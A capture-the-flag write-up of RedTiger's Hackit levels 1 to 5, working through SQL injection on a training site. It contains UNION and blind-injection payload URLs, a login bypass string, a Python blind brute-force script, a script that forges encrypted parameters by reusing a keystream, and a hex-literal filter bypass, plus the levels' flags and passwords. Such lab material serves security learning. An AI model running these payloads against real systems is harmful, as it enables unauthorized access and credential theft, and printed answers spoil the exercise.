writeup--RedTiger's Hackit

Source: Internet | Editor: 程序博客网 | Time: 2024/06/05 07:28

RedTiger’s Hackit

Level 1

Start by clicking into Category 1.
The URL now carries ?cat=1, an obvious SQL injection point.
The page even gives the table name: Tablename: level1_users
So build a UNION query. A UNION needs the same number of columns as the original SELECT (four here), hence the two filler values:
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

This returns the password: thatwaseasy

The flag is 27cbddc803ecde822d87a7e8639f9315

Level 2

There is a login form, so this should be SQL injection as well.
The classic universal username/password ' or ''=' worked on the first try: the injection went through.

The flag is 1222e2d4ad5da677efb188550528bfaa

Level 3

The hint says Get an error. I spent ages failing to produce one; from someone else's writeup I learned to change the parameter to ?usr[1]=1. PHP parses that as an array, so preg_match() receives an array where it expects a string and emits a warning that leaks the include file's path:
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25

urlcrypt.inc contains the code below, so the long strings after cow and admin are encrypted parameters. Since both encrypt() and decrypt() are given, the plan is simply to write the SQL injection, encrypt it with the same function and send the result. Note that the encryption has been changed over time, and that encrypt() only depends on the sequence rand() produces after srand(3284724), which is implementation-dependent: older PHP wrapped the C library's rand() (glibc and the Windows CRT differ), and PHP 7.1 and later alias rand() to mt_rand(). Encrypt under a PHP build that matches the server's (Linux worked for me); under Windows the output is still valid base64 but decrypts to garbage on the server.

<?php
// warning! ugly code ahead :)
function encrypt($str)
{
    $cryptedstr = "";
    srand(3284724);   // fixed seed: every call produces the same keystream
    for ($i = 0; $i < strlen($str); $i++)
    {
        // XOR each byte with the next PRNG byte, then write it as 3 decimal digits
        $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);
        while (strlen($temp) < 3)
        {
            $temp = "0" . $temp;
        }
        $cryptedstr .= $temp . "";
    }
    return base64_encode($cryptedstr);
}

function decrypt($str)
{
    srand(3284724);   // same seed, same keystream
    // must look like base64; passing an array here is what triggers the warning above
    if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str))
    {
        $str = base64_decode($str);
        if ($str != "" && $str != null && $str != false)
        {
            $decStr = "";
            for ($i = 0; $i < strlen($str); $i += 3)
            {
                $array[$i/3] = substr($str, $i, 3);   // split back into 3-digit groups
            }
            foreach ($array as $s)
            {
                $a = $s ^ rand(0, 255);   // numeric string XOR int
                $decStr .= chr($a);
            }
            return $decStr;
        }
        return false;
    }
    return false;
}
?>

The plaintext to encrypt is (the application supplies the closing quote after Admin):
' union select 1,password,2,3,4,5,6 from level3_users where username='Admin
After encryption the request becomes:
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

The flag is a707b245a60d570d25a0449c2a516eca
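Because encrypt() reseeds with a constant, every message is XORed with the same keystream, so the cipher is really a fixed key reused across messages. That means you do not need to reproduce PHP's rand() at all: one known plaintext/ciphertext pair of length N gives you the first N keystream bytes, and any payload up to N bytes can then be encrypted in any language. The following Python is an added example, not part of the original writeup or of the challenge code; it uses the level-3 payload and the usr= value above as its known pair and assumes that pair is a genuine encrypt() input and output.

```python
import base64

# Known plaintext/ciphertext pair from the writeup above (assumed to be a
# genuine encrypt() input/output; this script does not call PHP).
KNOWN_PT = "' union select 1,password,2,3,4,5,6 from level3_users where username='Admin"
KNOWN_CT = ("MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3"
            "MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4"
            "MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0"
            "MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIw"
            "MDcxMDQwMjIw")


def decode_groups(ct_b64: str) -> list[int]:
    """Undo the encoding half of urlcrypt.inc: base64-decode, then split the
    digit string into zero-padded 3-digit groups, one per plaintext byte."""
    digits = base64.b64decode(ct_b64, validate=True).decode("ascii")
    if not digits.isdigit() or len(digits) % 3:
        raise ValueError("not a urlcrypt.inc ciphertext")
    return [int(digits[i:i + 3]) for i in range(0, len(digits), 3)]


def encode_groups(values: list[int]) -> str:
    """Mirror of encrypt()'s output format: 3-digit decimal groups, base64-encoded."""
    return base64.b64encode("".join(f"{v:03d}" for v in values).encode("ascii")).decode("ascii")


def recover_keystream(plaintext: str, ct_b64: str) -> list[int]:
    """keystream[i] = ciphertext_byte[i] XOR plaintext_byte[i] (PHP works on raw bytes)."""
    groups = decode_groups(ct_b64)
    pt = plaintext.encode("latin-1")
    if len(groups) != len(pt):
        raise ValueError("plaintext and ciphertext lengths differ")
    return [g ^ p for g, p in zip(groups, pt)]


def encrypt_with_keystream(plaintext: str, keystream: list[int]) -> str:
    """Encrypt a new payload; only as many bytes as the recovered keystream covers."""
    pt = plaintext.encode("latin-1")
    if len(pt) > len(keystream):
        raise ValueError(f"payload is {len(pt)} bytes, only {len(keystream)} keystream bytes known")
    return encode_groups([p ^ k for p, k in zip(pt, keystream)])


def decrypt_with_keystream(ct_b64: str, keystream: list[int]) -> str:
    """Inverse of encrypt_with_keystream, for checking what the server will see."""
    groups = decode_groups(ct_b64)
    if len(groups) > len(keystream):
        raise ValueError("ciphertext longer than the known keystream")
    return bytes(g ^ k for g, k in zip(groups, keystream)).decode("latin-1")


if __name__ == "__main__":
    ks = recover_keystream(KNOWN_PT, KNOWN_CT)
    # A different payload of the same length (select username instead of password),
    # encrypted without ever running PHP:
    new_pt = KNOWN_PT.replace("1,password,", "1,username,")
    print(encrypt_with_keystream(new_pt, ks))
```

The recovered keystream is only as long as the longest known pair, so a longer payload raises ValueError rather than producing a ciphertext the server would mangle; collect a longer pair (or pad the known plaintext when you can get it encrypted) if you need more bytes.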

Level 4

Clicking click me adds ?id=1 to the URL, so it is clearly injectable; the level title says this one is a blind injection.
First guess how long keyword is:
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
The page prints Query returned 1 rows. whenever the injected condition holds, and it does for 21, so the length is 21. Now a Python script can brute-force it one character at a time:

import string
from urllib.parse import quote
from urllib.request import Request, urlopen

# Candidate alphabet. Under MySQL's default case-insensitive collation
# SUBSTR(...)='k' also matches 'K', so whichever case comes first in the
# alphabet is reported; this keyword happens to be all lowercase.
chars = string.printable
# Boolean condition injected into id; the page prints "Query returned 1 rows." when it holds.
url = ("http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201="
       "(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')")
login = {'Cookie': 'level4login=there_is_no_bug'}
answer = ""
for q in range(1, 22):          # keyword length is 21 (found above)
    for i in chars:
        # percent-encode the candidate so characters like #, & and whitespace
        # reach the query instead of breaking the URL
        request = Request(url.format(q, quote(i, safe='')), headers=login)
        s = urlopen(request).read().decode()
        if "Query returned 1 rows." in s:
            print("{0}  ".format(q) + i)
            answer += i
            break
print(answer)

The keyword is killstickswithbr1cks!

flag: e8bcb79c389f5e295bac81fda9fd7cfa

Level 5

The description says watch the login errors.
Entering admin as the username makes the input box disappear, so admin is filtered, and the filter ignores case as well. A hex string literal gets around it, since MySQL reads 0x61646d696e as the string admin without the word ever appearing in the request.
The hint also says the password is compared as an MD5 hash, so the injected row carries md5(123) as its password and the login is completed with 123 as the password:
' union select 0x61646d696e as username, md5(123) as password #

The flag is ca5c3c4f0bc85af1392aef35fc1d09b3

To be continued
